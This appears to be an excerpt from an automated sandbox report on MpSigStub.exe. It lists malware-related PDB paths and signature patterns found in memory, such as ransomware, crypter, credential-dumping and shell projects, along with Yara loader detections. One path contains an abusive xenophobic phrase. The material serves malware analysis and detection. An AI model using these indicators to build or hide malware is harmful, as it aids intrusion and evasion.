Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000026.00000003.18351876437.00000138BCDCA000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: module_ls.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000026.00000003.18309839037.00000138BE5D9000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: ,IKlllQWgbhejkWEJKHw7\\werrnJEKLJ32hjelkk.PDB source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: DDTBG.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: version.pdb@SH source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: LERKBleRM.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \devilman\xxxxx\catfight\iygmygjkxtyu.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb0 source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: samlib.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: DebugRelease\Form1.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: ntoskrnl.pdb source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp
Source:	Binary string: SAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-25cd2963.exe, 00000025.00000000.18201763876.00007FF7202FF000.00000002.00020000.sdmp
Source:	Binary string: feclient.pdb source: MpSigStub.exe, 00000026.00000003.18332439507.00000138BD299000.00000004.00000001.sdmp
Source:	Binary string: \regentry.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \ircBot\ircBot\obj\Release\LolCache.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: blackbox.pdbyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: /dQWPICl_Hude1v.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: PasswordFox.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb] source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: winsta.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Deonan\Release\Deonan.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb3 source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \SharPersist.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: WizzByPass.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: iwJL##$@#*$^#%@!^$.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: Corona.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: tkDecript.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug\|Release).{0,20}\\[A-Z]\1(Exe\|Dll)\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \Razvan\Desktop\Oh yeah\photo\photo\obj\Debug\leagueoflegends.pdb source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd1d8af6.146.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AllatoriJARObfuscator

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.71.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341014844.00000138BCCD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MSILLoadEncryptedAssembly

Show sources

Source: Yara match	File source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Binary or sample is protected by dotNetProtector

Show sources

Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>x
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp	String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: mpavbase.vdm.38.dr	Static PE information: real checksum: 0x354a210 should be:
Source: AZTEKERNES.exe.1.dr	Static PE information: real checksum: 0x22529 should be: 0x22f38
